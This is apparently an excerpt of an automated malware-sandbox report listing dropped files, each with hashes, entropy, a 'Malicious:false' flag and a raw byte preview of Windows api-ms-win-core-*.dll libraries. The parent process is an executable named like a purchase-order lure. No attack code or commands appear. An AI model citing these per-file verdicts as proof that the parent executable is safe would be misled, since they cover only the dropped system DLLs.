                            SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):21816
                            Entropy (8bit):7.014255619395433
                            Encrypted:false
                            SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
                            MD5:94AE25C7A5497CA0BE6882A00644CA64
                            SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
                            SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
                            SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d...................*...g...............*...U...................M...
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18232
                            Entropy (8bit):7.112057846012794
                            Encrypted:false
                            SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
                            MD5:E2F648AE40D234A3892E1455B4DBBE05
                            SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
                            SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
                            SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18232
                            Entropy (8bit):7.166618249693435
                            Encrypted:false
                            SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
                            MD5:E479444BDD4AE4577FD32314A68F5D28
                            SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
                            SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
                            SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..|........8...T...T.......4..|........d...............4..|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18232
                            Entropy (8bit):7.1117101479630005
                            Encrypted:false
                            SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
                            MD5:6DB54065B33861967B491DD1C8FD8595
                            SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
                            SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
                            SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18232
                            Entropy (8bit):7.174986589968396
                            Encrypted:false
                            SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                            MD5:2EA3901D7B50BF6071EC8732371B821C
                            SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                            SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                            SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):17856
                            Entropy (8bit):7.076803035880586
                            Encrypted:false
                            SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                            MD5:D97A1CB141C6806F0101A5ED2673A63D
                            SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                            SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                            SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18744
                            Entropy (8bit):7.131154779640255
                            Encrypted:false
                            SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                            MD5:D0873E21721D04E20B6FFB038ACCF2F1
                            SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                            SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                            SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):20792
                            Entropy (8bit):7.089032314841867
                            Encrypted:false
                            SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                            MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                            SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                            SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                            SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18744
                            Entropy (8bit):7.101895292899441
                            Encrypted:false
                            SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                            MD5:D500D9E24F33933956DF0E26F087FD91
                            SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                            SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                            SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18232
                            Entropy (8bit):7.16337963516533
                            Encrypted:false
                            SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                            MD5:6F6796D1278670CCE6E2D85199623E27
                            SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                            SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                            SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):19248
                            Entropy (8bit):7.073730829887072
                            Encrypted:false
                            SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                            MD5:5F73A814936C8E7E4A2DFD68876143C8
                            SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                            SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                            SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):19392
                            Entropy (8bit):7.082421046253008
                            Encrypted:false
                            SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                            MD5:A2D7D7711F9C0E3E065B2929FF342666
                            SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                            SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                            SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18744
                            Entropy (8bit):7.1156948849491055
                            Encrypted:false
                            SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                            MD5:D0289835D97D103BAD0DD7B9637538A1
                            SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                            SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                            SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):17712
                            Entropy (8bit):7.187691342157284
                            Encrypted:false
                            SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                            MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                            SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                            SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                            SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):17720
                            Entropy (8bit):7.19694878324007
                            Encrypted:false
                            SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                            MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                            SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                            SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                            SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18232
                            Entropy (8bit):7.137724132900032
                            Encrypted:false
                            SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                            MD5:12CC7D8017023EF04EBDD28EF9558305
                            SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                            SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                            SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):20280
                            Entropy (8bit):7.04640581473745
                            Encrypted:false
                            SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                            MD5:71AF7ED2A72267AAAD8564524903CFF6
                            SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                            SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                            SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):18744
                            Entropy (8bit):7.138910839042951
                            Encrypted:false
                            SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                            MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                            SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                            SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                            SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):19248
                            Entropy (8bit):7.072555805949365
                            Encrypted:false
                            SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                            MD5:19A40AF040BD7ADD901AA967600259D9
                            SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                            SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                            SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................
                            Process:C:\Users\user\Desktop\PO No. 3200005919.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
